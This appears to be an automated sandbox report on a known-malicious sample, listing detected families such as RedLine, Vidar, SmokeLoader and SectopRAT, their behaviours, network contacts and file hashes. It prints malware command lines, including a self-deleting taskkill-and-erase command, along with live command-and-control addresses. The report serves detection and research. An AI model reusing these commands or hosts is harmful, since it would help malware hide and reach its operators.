Analysis Overview
SHA256
f75d6ee676e63208489f05cd8c82d44fdda74b5752963e3967071f2d2d080113
Threat Level: Known bad
The file f75d6ee676e63208489f05cd8c82d44fdda74b5752963e3967071f2d2d080113 was found to be: Known bad.
Malicious Activity Summary
Redline family
Sectoprat family
Vidar family
Detects LgoogLoader payload
Detect Fabookie payload
FFDroider
Glupteba
Smokeloader family
Socelars
RedLine
Glupteba family
Ffdroider family
SmokeLoader
FFDroider payload
Socelars payload
Lgoogloader family
Socelars family
Windows security bypass
MetaSploit
RedLine payload
Gcleaner family
LgoogLoader
OnlyLogger
Metasploit family
Glupteba payload
Vidar
GCleaner
SectopRAT
Fabookie family
SectopRAT payload
Onlylogger family
Modifies boot configuration data using bcdedit
OnlyLogger payload
Vidar Stealer
Possible attempt to disable PatchGuard
Modifies Windows Firewall
Drops file in Drivers directory
Reads user/profile data of web browsers
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
Windows security modification
Deletes itself
Checks installed software on the system
Adds Run key to start application
Manipulates WinMon driver.
Legitimate hosting services abused for malware hosting/C2
Checks whether UAC is enabled
Manipulates WinMonFS driver.
Looks up geolocation information via web service
Drops Chrome extension
AutoIT Executable
Suspicious use of SetThreadContext
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Windows directory
Browser Information Discovery
Program crash
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: RenamesItself
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Checks SCSI registry key(s)
Enumerates system info in registry
Kills process with taskkill
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
GoLang User-Agent
Uses Task Scheduler COM API
Modifies system certificate store
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-08 01:41
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie family
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20240903-en
Max time kernel
141s
Max time network
130s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-EQ593.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-JSOAD.tmp\farlab_setup.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-EQ593.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-EQ593.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-EQ593.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-JSOAD.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-JSOAD.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-JSOAD.tmp\farlab_setup.tmp | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-EQ593.tmp\farlab_setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-JSOAD.tmp\farlab_setup.tmp | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-JSOAD.tmp\farlab_setup.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe
"C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-EQ593.tmp\farlab_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EQ593.tmp\farlab_setup.tmp" /SL5="$400E0,1570064,56832,C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe"
C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe
"C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-JSOAD.tmp\farlab_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JSOAD.tmp\farlab_setup.tmp" /SL5="$500E0,1570064,56832,C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe" /SILENT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | fobe1.com | udp |
Files
memory/1480-2-0x0000000000401000-0x000000000040B000-memory.dmp
memory/1480-0-0x0000000000400000-0x0000000000414000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-EQ593.tmp\farlab_setup.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/2160-8-0x0000000000400000-0x00000000004BD000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-MC430.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-MC430.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/1804-29-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1480-27-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2160-25-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1804-22-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1804-44-0x0000000000400000-0x0000000000414000-memory.dmp
memory/580-45-0x0000000000400000-0x00000000004BD000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20240729-en
Max time kernel
117s
Max time network
125s
Command Line
Signatures
Detects LgoogLoader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
LgoogLoader
Lgoogloader family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\inst002.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\inst002.exe
"C:\Users\Admin\AppData\Local\Temp\inst002.exe"
Network
Files
memory/1960-1-0x0000000000170000-0x0000000000182000-memory.dmp
memory/1960-0-0x00000000000F0000-0x0000000000100000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20241010-en
Max time kernel
120s
Max time network
126s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\jamesnew.exe
"C:\Users\Admin\AppData\Local\Temp\jamesnew.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bbaser2.webtm.ru | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
127s
Max time network
149s
Command Line
Signatures
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\mixseven.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\mixseven.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\mixseven.exe
"C:\Users\Admin\AppData\Local\Temp\mixseven.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1276 -ip 1276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1276 -s 552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1276 -ip 1276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1276 -s 656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1276 -ip 1276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1276 -s 768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1276 -ip 1276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1276 -s 552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1276 -ip 1276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1276 -s 656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1276 -ip 1276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1276 -s 1016
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1276 -ip 1276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1276 -s 1088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1276 -ip 1276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1276 -s 1496
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{xcHd-snd3h-WWRy-NSkcT}\92704376550.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{xcHd-snd3h-WWRy-NSkcT}\74543748199.exe" /mix
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{xcHd-snd3h-WWRy-NSkcT}\19533917000.exe" /mix
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1276 -ip 1276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1276 -s 1920
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "mixseven.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mixseven.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1276 -ip 1276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1276 -s 1672
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "mixseven.exe" /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | garbage-cleaner.biz | udp |
| UA | 194.145.227.161:80 | 194.145.227.161 | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:80 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 161.227.145.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
Files
memory/1276-1-0x0000000001F40000-0x0000000002040000-memory.dmp
memory/1276-2-0x0000000003AE0000-0x0000000003B10000-memory.dmp
memory/1276-3-0x0000000000400000-0x0000000000432000-memory.dmp
memory/1276-5-0x0000000001F40000-0x0000000002040000-memory.dmp
memory/1276-4-0x0000000000400000-0x0000000001D82000-memory.dmp
memory/1276-6-0x0000000003AE0000-0x0000000003B10000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{xcHd-snd3h-WWRy-NSkcT}\92704376550.exe
| MD5 | 6445250d234e789c0c2afe69f119e326 |
| SHA1 | 03074f75c0ff50783d8c2e32d96e39b746540f66 |
| SHA256 | 2e6cd9433e66a9ebde268bc6949d4660de441790bd39ffc9cb0f4caaeb44320f |
| SHA512 | ecd094a4d026378f85435f8a2dc16c92c033aff92ba126d8bbb22d6b279b842d417f4df0f63199ea248d0ec64b9679acb5a1f835560d8e3c5b84be492cc0e68e |
memory/1276-31-0x0000000000400000-0x0000000000432000-memory.dmp
memory/1276-30-0x0000000000400000-0x0000000001D82000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20240729-en
Max time kernel
117s
Max time network
126s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\DusBrowserInst.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\DusBrowserInst.exe
"C:\Users\Admin\AppData\Local\Temp\DusBrowserInst.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | one-online-gam3s.com | udp |
| US | 8.8.8.8:53 | oneeuropegroup.xyz | udp |
| US | 8.8.8.8:53 | eurovegas.xyz | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
Files
memory/2340-0-0x000007FEF57F3000-0x000007FEF57F4000-memory.dmp
memory/2340-1-0x0000000000360000-0x0000000000394000-memory.dmp
memory/2340-2-0x00000000002D0000-0x00000000002D6000-memory.dmp
memory/2340-3-0x00000000002E0000-0x0000000000306000-memory.dmp
memory/2340-4-0x0000000000300000-0x0000000000306000-memory.dmp
memory/2340-5-0x000007FEF57F0000-0x000007FEF61DC000-memory.dmp
memory/2340-6-0x000007FEF57F3000-0x000007FEF57F4000-memory.dmp
memory/2340-7-0x000007FEF57F0000-0x000007FEF61DC000-memory.dmp
memory/2340-8-0x000007FEF57F0000-0x000007FEF61DC000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
91s
Max time network
144s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\DusBrowserInst.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\DusBrowserInst.exe
"C:\Users\Admin\AppData\Local\Temp\DusBrowserInst.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | one-online-gam3s.com | udp |
| US | 8.8.8.8:53 | oneeuropegroup.xyz | udp |
| US | 8.8.8.8:53 | eurovegas.xyz | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.209.201.84.in-addr.arpa | udp |
Files
memory/1544-0-0x00007FFBC4D23000-0x00007FFBC4D25000-memory.dmp
memory/1544-1-0x0000000000360000-0x0000000000394000-memory.dmp
memory/1544-2-0x0000000002500000-0x0000000002506000-memory.dmp
memory/1544-3-0x0000000002510000-0x0000000002536000-memory.dmp
memory/1544-4-0x0000000002540000-0x0000000002546000-memory.dmp
memory/1544-5-0x00007FFBC4D20000-0x00007FFBC57E1000-memory.dmp
memory/1544-7-0x00007FFBC4D20000-0x00007FFBC57E1000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20240903-en
Max time kernel
119s
Max time network
121s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-T71R7.tmp\IDWCH2.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-T71R7.tmp\IDWCH2.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-T71R7.tmp\IDWCH2.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-T71R7.tmp\IDWCH2.tmp | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-T71R7.tmp\IDWCH2.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe
"C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe"
C:\Users\Admin\AppData\Local\Temp\is-T71R7.tmp\IDWCH2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T71R7.tmp\IDWCH2.tmp" /SL5="$5013A,506127,422400,C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | the-flash-man.com | udp |
| US | 8.8.8.8:53 | best-link-app.com | udp |
Files
memory/2788-0-0x0000000000400000-0x000000000046D000-memory.dmp
memory/2788-3-0x0000000000401000-0x000000000040B000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-T71R7.tmp\IDWCH2.tmp
| MD5 | 6020849fbca45bc0c69d4d4a0f4b62e7 |
| SHA1 | 5be83881ec871c4b90b4bf6bb75ab8d50dbfefe9 |
| SHA256 | c6c796f0d37e1a80632a295122db834499017b8d07728e0b5dfa6325ed3cab98 |
| SHA512 | f4c359a9ebf362b943d10772efe9cfd0a0153c1ff866ffdf1223e16e544dfa2250f67e7a7682d2558761d36efe15c7de1a2c311bc67b162eb77394ef179924eb |
memory/2924-8-0x0000000000400000-0x0000000000516000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-IV4GM.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-IV4GM.tmp\idp.dll
| MD5 | 8f995688085bced38ba7795f60a5e1d3 |
| SHA1 | 5b1ad67a149c05c50d6e388527af5c8a0af4343a |
| SHA256 | 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006 |
| SHA512 | 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35 |
memory/2924-23-0x0000000000400000-0x0000000000516000-memory.dmp
memory/2788-25-0x0000000000400000-0x000000000046D000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\udptest.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\udptest.exe
"C:\Users\Admin\AppData\Local\Temp\udptest.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| FR | 193.56.146.78:51487 | tcp | |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| FR | 193.56.146.78:51487 | tcp | |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| FR | 193.56.146.78:51487 | tcp | |
| US | 8.8.8.8:53 | 104.209.201.84.in-addr.arpa | udp |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| US | 8.8.8.8:53 | udp |
Files
